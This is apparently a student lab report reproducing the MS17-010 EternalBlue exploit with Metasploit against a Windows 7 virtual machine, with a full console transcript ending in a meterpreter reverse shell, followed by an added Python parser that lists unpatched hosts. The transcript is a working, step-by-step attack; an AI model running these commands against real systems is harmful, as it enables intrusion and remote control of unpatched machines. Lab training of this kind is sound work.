I. Experiment Title
Windows Network Service Penetration Testing: Reproducing the MS17-010 Vulnerability
II. Experiment Purpose and Requirements
Become familiar with the use of the Metasploit console;
Master the method of attacking the MS17-010 vulnerability.
III. Reproduction Steps (with text explanation and screenshots attached)
1. NAT mode
Kali Linux: 192.168.232.141
Windows 7: 192.168.232.142
2. Check the IP addresses
kali: ip a
win7: ipconfig
3. Restart the network service
service networking restart
4. Test connectivity
kali: ping 192.168.237.150
5. Enter the msf console
msfconsole
6. Search for the vulnerability module
search ms17-010
7. Use the scanner module
use auxiliary/scanner/smb/smb_ms17_010
8. View the options
show options
9. Set the options
set rhost 192.168.237.150
set rport 445
10. Verify
run
exploit
11. Use the exploit module
use exploit/windows/smb/ms17_010_eternalblue
12. View the options
show options
13. Set the options
set lhost 192.168.237.132
set lport 4444
set rhost 192.168.237.150
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
14. Attack
run
┌──(kali㉿kali)-[~/Desktop]
└─$ ip a
1: lo:
2: eth0:
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 192.168.232.142
PING 192.168.232.142 (192.168.232.142) 56(84) bytes of data.
64 bytes from 192.168.232.142: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.232.142: icmp_seq=2 ttl=128 time=1.19 ms
64 bytes from 192.168.232.142: icmp_seq=3 ttl=128 time=0.565 ms
64 bytes from 192.168.232.142: icmp_seq=4 ttl=128 time=0.367 ms
64 bytes from 192.168.232.142: icmp_seq=5 ttl=128 time=0.487 ms
64 bytes from 192.168.232.142: icmp_seq=6 ttl=128 time=0.658 ms
64 bytes from 192.168.232.142: icmp_seq=7 ttl=128 time=0.346 ms
64 bytes from 192.168.232.142: icmp_seq=8 ttl=128 time=0.556 ms
^Z
zsh: suspended  ping 192.168.232.142

┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole

       =[ metasploit v6.1.4-dev                          ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Start commands with a space to avoid saving
them to history

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_et
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms17_010_eternalblue

[*] Using exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.232.141  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.232.141
lhost => 192.168.232.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.232.142
rhost => 192.168.232.142
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.232.141:4444
[*] 192.168.232.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.232.142:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.232.142:445 - The target is vulnerable.
[*] 192.168.232.142:445 - Connecting to target for exploitation.
[+] 192.168.232.142:445 - Connection established for exploitation.
[+] 192.168.232.142:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.232.142:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.232.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.232.142:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.232.142:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.232.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.232.142:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.232.142:445 - Sending all but last fragment of exploit packet
[*] 192.168.232.142:445 - Starting non-paged pool grooming
[+] 192.168.232.142:445 - Sending SMBv2 buffers
[+] 192.168.232.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.232.142:445 - Sending final SMBv2 buffers.
[*] 192.168.232.142:445 - Sending last fragment of exploit packet!
[*] 192.168.232.142:445 - Receiving response from exploit packet
[+] 192.168.232.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.232.142:445 - Sending egg to corrupted connection.
[*] 192.168.232.142:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.232.142
[*] Meterpreter session 1 opened (192.168.232.141:4444 -> 192.168.232.142:49717) at 2022-05-16 05:22:53 -0400
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.232.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > ipconfig

Interface  1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:0c:d1:dc
MTU : 1500
IPv4 Address : 192.168.232.142
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::6d7a:d608:7ec3:80e
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:c0a8:e88e
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 13
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280

Interface 15
============
Name : Bluetooth vc6
Hardware MAC : c0:3c:59:b9:be:40
MTU : 1500
IPv4 Address : 169.254.121.120
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::2898:c717:bd6d:7978
IPv6 Netmask : ffff:ffff:ffff:ffff::
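As an added example (not part of the original lab report or of Metasploit itself), a small Python parser that turns the smb_ms17_010 scanner output shown above into a list of hosts still unpatched for MS17-010, so a lab or internal scan can be tracked for remediation; the sample output is constructed, and the "does NOT appear vulnerable" line is an assumed format for a patched host, since the page only shows the vulnerable case.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the format the auxiliary/scanner/smb/smb_ms17_010 module
# printed in the lab transcript above. The "does NOT appear vulnerable" line is an
# assumed format for a patched host; the page only shows the vulnerable case.
SAMPLE_OUTPUT = """\
[+] 192.168.232.142:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[-] 192.168.232.150:445 - Host does NOT appear vulnerable.
[*] 192.168.232.142:445 - Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

VULN_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+"
    r"Host is likely VULNERABLE to MS17-010!\s+-\s+(?P<os>.+?)\s*$"
)
SCANNED_RE = re.compile(r"Scanned (?P<done>\d+) of (?P<total>\d+) hosts")

@dataclass
class Finding:
    host: str
    port: int
    os: str
    arch: Optional[str]  # "x64" or "x86" when the OS string states it

@dataclass
class ScanSummary:
    findings: list = field(default_factory=list)
    hosts_scanned: int = 0
    hosts_total: int = 0

    def complete(self) -> bool:
        return self.hosts_total > 0 and self.hosts_scanned == self.hosts_total

def parse_scanner_output(text: str) -> ScanSummary:
    """Turn raw msfconsole scanner output into unpatched hosts plus scan coverage."""
    summary = ScanSummary()
    for line in text.splitlines():
        if m := VULN_RE.match(line):  # only a "[+]" line with the MS17-010 verdict counts
            os_str = m.group("os")
            arch = re.search(r"\b(x64|x86)\b", os_str)
            summary.findings.append(Finding(m.group("host"), int(m.group("port")),
                                            os_str, arch.group(1) if arch else None))
        elif s := SCANNED_RE.search(line):  # the last progress line carries the final counts
            summary.hosts_scanned = int(s.group("done"))
            summary.hosts_total = int(s.group("total"))
    return summary
```

Each Finding is a host that still needs the MS17-010 update (and, where possible, SMBv1 disabled and TCP 445 blocked from untrusted networks); complete() confirms the scan actually covered every targeted host before the list is trusted.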